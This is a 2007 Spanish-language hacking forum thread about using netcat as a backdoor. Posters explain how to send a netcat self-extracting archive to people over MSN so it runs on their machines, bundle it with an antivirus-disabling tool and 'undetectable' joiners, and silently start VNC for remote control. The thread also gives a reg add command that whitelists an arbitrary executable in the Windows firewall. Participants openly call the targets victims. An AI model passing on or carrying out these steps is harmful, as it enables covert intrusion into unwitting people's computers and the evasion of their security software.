Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

nitratus

Además de los puertos 80, 21 y 25 que otros puertos no son detectados por el firewall?. y nos pueden ser de utlidad?

lAl

pues hermano hay te va una listita de los puertos para que busques..

http://es.wikipedia.org/wiki/Anexo:Lista_de_n%C3%BAmeros_de_puerto

te recomiendo que bajes el Nmap y des una escaneada a la dirección que quieras e inclusive una pagina de internet(es lo mismo pones la ip nada más que en letritas jajajaja).. y una vez echo te arroje que puertos esta utilizando y tiene abiertos..

saludos... jojojojojo

WHK

#182
Hola nuevamente...

Citarno se si por que me tenga que saltar el firewall o el puerto que puse no este avierto(puerto 80) pero me imagino que si por que es el que las pc tiene abierto por default

Hay antivirus que te impiden usar el netcat..ojo.. otra cosa puede ser que tu no puedas ponerte de servidor ya que es una red familiar y para eso necesitas abrir el puerto a utilizar desde tu router, si el router no es tuyo entonces pideles permiso para que te abran uno solo (ingeniatelas por ejemplo el puerto 80 sería genial o el 21).

CitarMe han surgido varias dudas, 1 ene l video q me baje se ve como solo usas un arxivo llamado nc.exe, pro yo me bajao 2 el cliente y el servidor. Cual debo usar? ando perdido

Ese del cliente y el servidor es un proyecto... el que debes bajar es el netcat simple:
http://www.vulnwatch.org/netcat/nc111nt.zip
Usa nc.exe

CitarPor favor podriais enseñarme como hacerlo indetectable.
jajaa si les digo como se las pasarían de traviesos  :P... usen algún AVFuck o metodos para detener el antivirus y despues descomprimir el netcat.. por ejemplo... en un archivo rar sfx meten dos archivos... uno con el netcat y otro con el avfuck... primero se detiene el antivirus y cuando reinicie sale a la batalla el netcat  ;D pueden usar joiners indetectables como el de mad antrax.

CitarInvalid VNC server specified. Server should be of the form host:display
Mira esto:
http://www.realvnc.com/pipermail/vnc-list/2001-May/022536.html
Acá dice que no resuelve tu IP ... talves no puede4s ponerte de servidor ya sea por el antivirus, cortafuegos, configuración de router, etc etc.

Citarat "la hora" /interactive "qttask.exe"
Solo pon at "hora" "ejecutable -variables"

Citarno pudo quitar el nod32 con tasskill
No puedes detener antivirus ni nada de eso con tskill ni tasskill.

Intenten ejecutar el VNC sin el comando AT... o sea...
VNC -register
VNC -start
VNC -connect mi ip

Si lo haces desde tu shell la otra persona no verá nada.

CitarAdemás de los puertos 80, 21 y 25 que otros puertos no son detectados por el firewall?. y nos pueden ser de utlidad?
Puedes detener el firewall mejor y de esa manera tienes todos los puertos libres que quieras  :P

reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "ejecutable" /t reg_sz /d "ejecutable:*:Enabled:ejecutable" /f

Ojala les sirva a todos... cualquier duda busquen primero y si no está entonces pregunten y con mucho gusto yo o el que quiera aportar podremos ayudarles  ;)

carlipus

WHK ejecuto eso desde mi shell? no pasa nada, no me conecta

Pongo en mi shell:
winvnc -register
Winvnc -start
Winvnc -connect su ip

y si lo hago desde la shell de la victima nada tampoco, no lo entendi muy bien.

Saludos

Crwy

Cita de: WHK en 27 Junio 2007, 02:03 AM

CitarMe han surgido varias dudas, 1 ene l video q me baje se ve como solo usas un arxivo llamado nc.exe, pro yo me bajao 2 el cliente y el servidor. Cual debo usar? ando perdido

Ese del cliente y el servidor es un proyecto... el que debes bajar es el netcat simple:
http://www.vulnwatch.org/netcat/nc111nt.zip
Usa nc.exe


Gracias man, ya me lo descargao ara voy ha hacer la prueba. ;)


Saludos  ;D ;D
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.

Alvaro_TheMaster

ola, pues mi problema es el siguiente:

yo creo el archivo sfx del nc y lo pongo todo como sale en el tutorial y pongo mi ip publica. se lo mado a uno por el msn y le digo k lo ejecute, pongo el cmd en escucha del puerto 80 pero no m llega ninguna señal y la persona del msn dice k lo a ejecutado. cuando me lo ejecuto  ami mismo si slae pero pork cuando se lo paso no?????

saludos y espero k alguien me responda

ReVoX

Me ha surgido un problema, ya lo tengo todo creado y bien, pero cuando intento escuchar al .exe me da un error:

C:\Documents and Settings\ReVoX>chdir C:\Windows (Para entrar en C:\Windows, no se si es necesario, pero yo lo hice)

C:\WINDOWS>nc -vv -L -p 80
"nc" no se reconoce como un comando interno o externo
programa o archivo por lotes ejecutable.


WHK

Citar"nc" no se reconoce como un comando interno o externo
programa o archivo por lotes ejecutable.

Primero que nada Hola... buenas noches a todos.

No te reconoce el netcat porque no lo tienes o simpelemnte porque tu antivirus lo ha bloqueado o borrado. Fijate bien en las opciones de tu antivirus y añadelo a la lista de excluidos.
De todas formas baja el netcat y luego abre el explorador de Windows, en la parte de arriba donde muestra la ruta escribe %windir%\system32 y en ese lugar pon tu netcat con el nombre de nc.exe

Citaryo creo el archivo sfx del nc y lo pongo todo como sale en el tutorial y pongo mi ip publica. se lo mado a uno por el msn y le digo k lo ejecute, pongo el cmd en escucha del puerto 80 pero no m llega ninguna señal y la persona del msn dice k lo a ejecutado. cuando me lo ejecuto  ami mismo si slae pero pork cuando se lo paso no?????

Eso puede ser porque no estas escuchando atraves de tus puertos publicamente. Me explico.

Yo tengo dos IP... una interna la cual me veo yo y los que estan dentro de mi casa como por ejemplo 192.168.xx.xx, ahora mi ip pública no deve contener esos números. Tu ip pública está acá:
http://ip.interchile.com/
Recuerda que si vas a escuchar atraves del puerto 80 Debes abrir tu puerto 80 (solo los que usan router a exepción de los que usan telefónica) y con todo esto devería resultar todo muy bien.

Si dices que tu puedes verte pero con tu amigo no te resulta es porque le diste la ip equibocada o tus puertos se encuentran cerrados.

Prueva de conectividad:

1. Ver ti IP acá -> http://ip.interchile.com/
2. Ejecutar nc -L -p 80 -vv
3. Ejecutar nc IP 80 (Donde dice IP le pones la que te apareció en interchile)
4. Si puedes ver que se conecta bien es porque tienes tus puertos abiertos.
Si no puedes realizar la conexión es porque simplemente no puedes escuchar como servidor a menos que uses los puertos por defecto de todas las compañias de internet y telefonía tales como telefonica y VTR... estos puertos son el 5101 (Usado para Yahoo Messenger) y el 1863 (Usadop para el MSN Messenger). Lo he visto yo mismo... el 90% de mis amigos que tienen una conexión con sus puertod limitados tienen estos abiertos por defecto para que no les reclamen cuando quieran chatear  :P


Bueno... voy a crear varios Netcat con su Icono cambiado para que ya no tengan mas problemas.

Estoy compilando unos programas que les ayudaran a ocultar netcat dentro de otro ejecutable y cuando se abra ese no lanze el pantallazo de DOS.
Otras opciones para autoarranque de diversas formas, Elevación de permisos con diferentes exploits para Sistemas operativos Objetivos, Uso automatizado del comando AT yReg, Entre otras cosas mas, dentro de unos dias.

PD: Código fuente totalemente abierto (Open Source).

Alvaro_TheMaster


perseus68

Soy muy novato.... :-(
La verdad es que aqui´hay gente con 2 coj..es .....pero enormes  :o
Enhorabuena.Me lo leo con calma a ver si aprendo algo.

Un saludo
M.